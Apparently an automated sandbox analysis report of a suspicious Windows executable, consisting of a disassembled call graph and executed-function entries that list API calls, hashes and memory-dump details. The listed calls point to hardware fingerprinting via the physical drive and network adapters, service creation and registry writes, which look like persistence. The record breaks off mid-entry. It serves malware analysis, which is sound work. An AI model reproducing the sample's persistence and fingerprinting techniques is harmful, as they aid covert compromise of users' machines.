404dcf GetEnvironmentStringsW 3282->3284 3286 404dd7 3283->3286 3287 404df3 3283->3287 3285 404de3 GetEnvironmentStrings 3284->3285 3284->3286 3285->3287 3288 403196 3285->3288 3289 404e1b WideCharToMultiByte 3286->3289 3290 404e0f GetEnvironmentStringsW 3286->3290 3287->3288 3291 404ea1 3287->3291 3292 404e95 GetEnvironmentStrings 3287->3292 3305 404b67 3288->3305 3294 404e81 FreeEnvironmentStringsW 3289->3294 3295 404e4f 3289->3295 3290->3288 3290->3289 3296 403010 12 API calls 3291->3296 3292->3288 3292->3291 3294->3288 3297 403010 12 API calls 3295->3297 3303 404ebc 3296->3303 3298 404e55 3297->3298 3298->3294 3299 404e5e WideCharToMultiByte 3298->3299 3301 404e78 3299->3301 3302 404e6f 3299->3302 3300 404ed2 FreeEnvironmentStringsA 3300->3288 3301->3294 3487 403251 3302->3487 3303->3300 3306 404b79 3305->3306 3307 404b7e GetModuleFileNameA 3305->3307 3517 406707 3306->3517 3309 404ba1 3307->3309 3310 403010 12 API calls 3309->3310 3311 404bc2 3310->3311 3312 404bd2 3311->3312 3313 403208 7 API calls 3311->3313 3312->3244 3313->3312 3315 404abb 3314->3315 3317 404ac0 3314->3317 3316 406707 19 API calls 3315->3316 3316->3317 3318 403010 12 API calls 3317->3318 3319 404aed 3318->3319 3320 403208 7 API calls 3319->3320 3326 404b01 3319->3326 3320->3326 3321 404b44 3322 403251 7 API calls 3321->3322 3323 404b50 3322->3323 3323->3246 3324 403010 12 API calls 3324->3326 3325 403208 7 API calls 3325->3326 3326->3321 3326->3324 3326->3325 3328 404a5f 3327->3328 3330 404a64 3327->3330 3329 406707 19 API calls 3328->3329 3329->3330 3330->3249 3332 403236 3331->3332 3333 40323b 3331->3333 3335 405264 7 API calls 3332->3335 3334 40529d 7 API calls 3333->3334 3336 403244 ExitProcess 3334->3336 3335->3333 3541 40481f 3337->3541 3340 4048d2 3341 4048de 3340->3341 3342 404a07 UnhandledExceptionFilter 3341->3342 3343 4048f2 3341->3343 3342->3343 3343->3255 3343->3343 3367 402ef0 3344->3367 3347 403345 GetEnvironmentVariableA 3349 403422 3347->3349 3352 403364 3347->3352 3348 40332b 3348->3347 3350 40333d 3348->3350 3349->3350 3372 4032d5 GetModuleHandleA 3349->3372 3350->3261 3350->3262 3353 4033a9 GetModuleFileNameA 3352->3353 3354 4033a1 3352->3354 3353->3354 3354->3349 3369 4053f0 3354->3369 3357 4034c3 3356->3357 3357->3265 3359 403d05 3358->3359 3360 403d0c HeapAlloc 3358->3360 3361 403d29 VirtualAlloc 3359->3361 3360->3361 3366 403d61 3360->3366 3362 403d49 VirtualAlloc 3361->3362 3363 403e1e 3361->3363 3364 403e10 VirtualFree 3362->3364 3362->3366 3365 403e26 HeapFree 3363->3365 3363->3366 3364->3363 3365->3366 3366->3265 3368 402efc GetVersionExA 3367->3368 3368->3347 3368->3348 3374 405407 3369->3374 3373 4032ec 3372->3373 3373->3350 3376 40541f 3374->3376 3379 40544f 3376->3379 3381 405c3b 3376->3381 3377 405403 3377->3349 3378 405c3b 6 API calls 3378->3379 3379->3377 3379->3378 3385 4068ae 3379->3385 3382 405c4d 3381->3382 3383 405c59 3381->3383 3382->3376 3391 40697a 3383->3391 3386 4068d9 3385->3386 3390 4068bc 3385->3390 3387 4068f5 3386->3387 3388 405c3b 6 API calls 3386->3388 3387->3390 3403 406ac3 3387->3403 3388->3387 3390->3379 3392 4069ab GetStringTypeW 3391->3392 3394 4069c3 3391->3394 3393 4069c7 GetStringTypeA 3392->3393 3392->3394 3393->3394 3397 406aaf 3393->3397 3395 4069ee GetStringTypeA 3394->3395 3398 406a12 3394->3398 3395->3397 3397->3382 3398->3397 3399 406a28 MultiByteToWideChar 3398->3399 3399->3397 3400 406a4c 3399->3400 3400->3397 3401 406a86 MultiByteToWideChar 3400->3401 3401->3397 3402 406a9f GetStringTypeW 3401->3402 3402->3397 3404 406af3 LCMapStringW 3403->3404 3405 406b0f 3403->3405 3404->3405 3406 406b17 LCMapStringA 3404->3406 3408 406b75 3405->3408 3409 406b58 LCMapStringA 3405->3409 3406->3405 3407 406c51 3406->3407 3407->3390 3408->3407 3410 406b8b MultiByteToWideChar 3408->3410 3409->3407 3410->3407 3411 406bb5 3410->3411 3411->3407 3412 406beb MultiByteToWideChar 3411->3412 3412->3407 3413 406c04 LCMapStringW 3412->3413 3413->3407 3414 406c1f 3413->3414 3415 406c25 3414->3415 3417 406c65 3414->3417 3415->3407 3416 406c33 LCMapStringW 3415->3416 3416->3407 3417->3407 3418 406c9d LCMapStringW 3417->3418 3418->3407 3419 406cb5 WideCharToMultiByte 3418->3419 3419->3407 3430 403022 3421->3430 3424 403208 3425 403211 3424->3425 3426 403216 3424->3426 3467 405264 3425->3467 3473 40529d 3426->3473 3431 40301f 3430->3431 3433 403029 3430->3433 3431->3271 3431->3424 3433->3431 3434 40304e 3433->3434 3435 403072 3434->3435 3436 40305d 3434->3436 3438 4030b1 HeapAlloc 3435->3438 3442 40306b 3435->3442 3449 403ff0 3435->3449 3436->3442 3443 403843 3436->3443 3439 4030c0 3438->3439 3439->3433 3440 403070 3440->3433 3442->3438 3442->3439 3442->3440 3446 403875 3443->3446 3444 403914 3448 403923 3444->3448 3463 403bfd 3444->3463 3446->3444 3446->3448 3456 403b4c 3446->3456 3448->3442 3450 403ffe 3449->3450 3451 4040ea VirtualAlloc 3450->3451 3452 4041bf 3450->3452 3455 4040bb 3450->3455 3451->3455 3453 403cf8 5 API calls 3452->3453 3453->3455 3455->3442 3457 403b8f HeapAlloc 3456->3457 3458 403b5f HeapReAlloc 3456->3458 3460 403bb5 VirtualAlloc 3457->3460 3461 403bdf 3457->3461 3459 403b7e 3458->3459 3458->3461 3459->3457 3460->3461 3462 403bcf HeapFree 3460->3462 3461->3444 3462->3461 3464 403c0f VirtualAlloc 3463->3464 3466 403c58 3464->3466 3466->3448 3468 40526e 3467->3468 3469 40529b 3468->3469 3470 40529d 7 API calls 3468->3470 3469->3426 3471 405285 3470->3471 3472 40529d 7 API calls 3471->3472 3472->3469 3476 4052b0 3473->3476 3474 40321f 3474->3271 3475 4053c7 3478 4053da GetStdHandle WriteFile 3475->3478 3476->3474 3476->3475 3477 4052f0 3476->3477 3477->3474 3479 4052fc GetModuleFileNameA 3477->3479 3478->3474 3480 405314 3479->3480 3482 406723 3480->3482 3483 406730 LoadLibraryA 3482->3483 3485 406772 3482->3485 3484 406741 GetProcAddress 3483->3484 3483->3485 3484->3485 3486 406758 GetProcAddress GetProcAddress 3484->3486 3485->3474 3486->3485 3488 403279 3487->3488 3489 40325d 3487->3489 3488->3301 3490 403267 3489->3490 3491 40327d 3489->3491 3493 4032a9 HeapFree 3490->3493 3494 403273 3490->3494 3492 4032a8 3491->3492 3496 403297 3491->3496 3492->3493 3493->3488 3498 40351a 3494->3498 3504 403fab 3496->3504 3499 403558 3498->3499 3503 40380e 3498->3503 3500 403754 VirtualFree 3499->3500 3499->3503 3501 4037b8 3500->3501 3502 4037c7 VirtualFree HeapFree 3501->3502 3501->3503 3502->3503 3503->3488 3505 403fd8 3504->3505 3506 403fee 3504->3506 3505->3506 3508 403e92 3505->3508 3506->3488 3511 403e9f 3508->3511 3509 403f4f 3509->3506 3510 403ec0 VirtualFree 3510->3511 3511->3509 3511->3510 3513 403e3c VirtualFree 3511->3513 3514 403e59 3513->3514 3515 403e89 3514->3515 3516 403e69 HeapFree 3514->3516 3515->3511 3516->3511 3518 406710 3517->3518 3519 406717 3517->3519 3521 406343 3518->3521 3519->3307 3528 4064dc 3521->3528 3524 406386 GetCPInfo 3526 40639a 3524->3526 3527 4064d0 3526->3527 3533 406582 GetCPInfo 3526->3533 3527->3519 3529 4064fc 3528->3529 3530 4064ec GetOEMCP 3528->3530 3531 406354 3529->3531 3532 406501 GetACP 3529->3532 3530->3529 3531->3524 3531->3526 3531->3527 3532->3531 3534 40666d 3533->3534 3537 4065a5 3533->3537 3534->3527 3535 40697a 6 API calls 3536 406621 3535->3536 3538 406ac3 9 API calls 3536->3538 3537->3535 3539 406645 3538->3539 3540 406ac3 9 API calls 3539->3540 3540->3534 3542 40482b GetCurrentProcess TerminateProcess 3541->3542 3545 40483c 3541->3545 3542->3545 3543 4031e9 3543->3340 3544 4048a6 ExitProcess 3545->3543 3545->3544 3549 402994 CopyFileA 3647 40d415 GetModuleHandleA 3767 404395 3772 405cb0 3767->3772 3769 4043a3 3770 4043d5 3769->3770 3771 405c3b 6 API calls 3769->3771 3771->3769 3773 405cdd 3772->3773 3777 405cc0 3772->3777 3774 405cfb 3773->3774 3775 405c3b 6 API calls 3773->3775 3776 406ac3 9 API calls 3774->3776 3774->3777 3775->3774 3776->3777 3777->3769 3648 402a1b 3649 40d9e5 GetModuleHandleA 3648->3649 3650 40d945 GetModuleFileNameW 3649->3650 3651 40db26 3650->3651 3778 40219d 3779 4021a2 3778->3779 3780 402a02 3779->3780 3781 40d6ea GetLastError 3779->3781 3782 40d953 LoadLibraryExA 3781->3782 3783 40d96a 3782->3783 3783->3783 3590 40481f 3591 40482b GetCurrentProcess TerminateProcess 3590->3591 3594 40483c 3590->3594 3591->3594 3592 4048b6 3593 4048a6 ExitProcess 3594->3592 3594->3593 3722 402721 3723 403010 12 API calls 3722->3723 3724 402726 3723->3724 3704 4028a4 3705 40d2c8 CreateServiceA 3704->3705 3226 40d62b RegCreateKeyExA 3784 4025ad 3785 4025b2 3784->3785 3786 40d253 GetTickCount 3785->3786 3652 402a32 3653 402a37 3652->3653 3654 40db2e GetCommandLineW 3653->3654 3787 4023b3 RegisterServiceCtrlHandlerA 3788 4023d6 3787->3788 3789 4024cc 3787->3789 3790 4023e4 SetServiceStatus GetLastError CreateEventA 3788->3790 3791 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3790->3791 3792 40243e GetLastError 3790->3792 3793 4024c3 SetServiceStatus 3791->3793 3792->3793 3793->3789 3794 40d1b6 3795 4021a2 3794->3795 3797 402a02 3794->3797 3796 40d6ea GetLastError 3795->3796 3795->3797 3798 40d953 LoadLibraryExA 3796->3798 3799 40d96a 3798->3799 3799->3799 3800 4025ba 3801 40d268 GetModuleFileNameA 3800->3801 3655 40283e 3658 401f64 FindResourceA 3655->3658 3657 402843 3659 401f86 GetLastError SizeofResource 3658->3659 3665 401f9f 3658->3665 3660 401fa6 LoadResource LockResource GlobalAlloc 3659->3660 3659->3665 3661 401fd2 3660->3661 3662 401ffb GetTickCount 3661->3662 3663 402005 GlobalAlloc 3662->3663 3663->3665 3665->3657

                                                                                                                            Executed Functions

                                                                                                                            Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                            • API String ID: 514930453-3667123677
                                                                                                                            • Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
                                                                                                                            • Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402e56 31->33 37 401b09-401b0c 32->37 38 401b3a-401b44 FindCloseChangeNotification 32->38 33->32 34->31 39 401adb-401af1 call 402e70 call 4018cc 34->39 35->31 41 401b27-401b34 call 402e48 37->41 42 401b0e-401b17 GetLastError 37->42 38->27 39->31 41->29 41->38 42->38 44 401b19-401b1c 42->44 44->41 47 401b1e-401b24 44->47 47->41
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                                            • API String ID: 3786717961-1180397377
                                                                                                                            • Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
                                                                                                                            • Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D234 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 121 40d234-40dc65 StartServiceCtrlDispatcherA
                                                                                                                            APIs
                                                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3789849863-0
                                                                                                                            • Opcode ID: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
                                                                                                                            • Instruction ID: 707de1fed31c9c9cc4664e0c652b34d30681ff1bd6120e3740f17fb32104e870
                                                                                                                            • Opcode Fuzzy Hash: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
                                                                                                                            • Instruction Fuzzy Hash: 42D05B20408100C6C21417E555550783765DD55330B11CF7690FE714E28A7904CBA61E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026E9 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 135 4026e9-40d658 138 40d7f5-40dc65 StartServiceCtrlDispatcherA 135->138
                                                                                                                            APIs
                                                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3789849863-0
                                                                                                                            • Opcode ID: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
                                                                                                                            • Instruction ID: 789ae47976887c049220f5e5451efe9368f5d3cf5dad1ab7781d5bfdbef77079
                                                                                                                            • Opcode Fuzzy Hash: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
                                                                                                                            • Instruction Fuzzy Hash: 06C0022090C411D6C6186BD0AB540716638E65A356F208ABAD45BB08E68F7D088EF62E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403112 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32 ref: 00403138
                                                                                                                              • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00403186
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 004031B1
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
                                                                                                                              • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2057626494-0
                                                                                                                            • Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
                                                                                                                            • Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12timeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 79 40d869-40dcc7 CommandLineToArgvW GetLocalTime call 401f27 84 40dccc 79->84 84->84
                                                                                                                            APIs
                                                                                                                            • CommandLineToArgvW.SHELL32 ref: 0040D869
                                                                                                                            • GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArgvCommandLineLocalTime
                                                                                                                            • String ID: XiM#
                                                                                                                            • API String ID: 561774760-2404075716
                                                                                                                            • Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
                                                                                                                            • Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040481F Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 85 40481f-404829 86 40482b-404836 GetCurrentProcess TerminateProcess 85->86 87 40483c-404852 85->87 86->87 88 404890-4048a4 call 4048b8 87->88 89 404854-40485b 87->89 97 4048b6-4048b7 88->97 98 4048a6-4048b0 ExitProcess 88->98 91 40485d-404869 89->91 92 40487f-40488f call 4048b8 89->92 94 40486b-40486f 91->94 95 40487e 91->95 92->88 99 404871 94->99 100 404873-40487c 94->100 95->92 99->100 100->94 100->95
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 0040482F
                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 00404836
                                                                                                                            • ExitProcess.KERNEL32 ref: 004048B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1703294689-0
                                                                                                                            • Opcode ID: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
                                                                                                                            • Instruction ID: 144ee4ae690132be24d3b7439d4fde7c7cee5440a8ed28615e41e0a9dc7ff649
                                                                                                                            • Opcode Fuzzy Hash: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
                                                                                                                            • Instruction Fuzzy Hash: D601DB77640350DEEA10BF55FE85A1677A4FBC5750B10893FE540721E2C734AC41CA6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040344A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 102 40344a-403468 HeapCreate 103 4034a0-4034a2 102->103 104 40346a-403477 call 403302 102->104 107 403486-403489 104->107 108 403479-403484 call 4034a7 104->108 110 4034a3-4034a6 107->110 111 40348b call 403cf8 107->111 114 403490-403492 108->114 111->114 114->110 115 403494-40349a HeapDestroy 114->115 115->103
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                              • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2507506473-0
                                                                                                                            • Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
                                                                                                                            • Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040218D Relevance: 3.0, APIs: 2, Instructions: 14registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 116 40218d-40dc54 RegSetValueExA RegCloseKey
                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,00000004), ref: 0040D70D
                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00000004), ref: 0040DC54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3132538880-0
                                                                                                                            • Opcode ID: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
                                                                                                                            • Instruction ID: 6dcc4c43cecca713c479bc083516d2f00d0eb767f36aa46da61f939dff5b1dac
                                                                                                                            • Opcode Fuzzy Hash: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
                                                                                                                            • Instruction Fuzzy Hash: 66D09E70808005EFCF8567908E48AA97A786B04345F110076E243764D48BB5099AAA1E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402981 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 127 402981-402989 RegOpenKeyExA 128 4029be 127->128 129 40d0d4-40d8a4 128->129 130 4029c4-4029c7 128->130 130->129 131 40d5c4-40d976 130->131
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            • Opcode ID: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
                                                                                                                            • Instruction ID: 7df17e09f2432b10eb6c2be66ef450d18aff74beed7de32105507e4b1735c4b5
                                                                                                                            • Opcode Fuzzy Hash: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
                                                                                                                            • Instruction Fuzzy Hash: 7DD09E74D1801AEBD705CAA08E08AFA72A87B04304F5049379557B21C0D7B8D50E575A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040226A Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
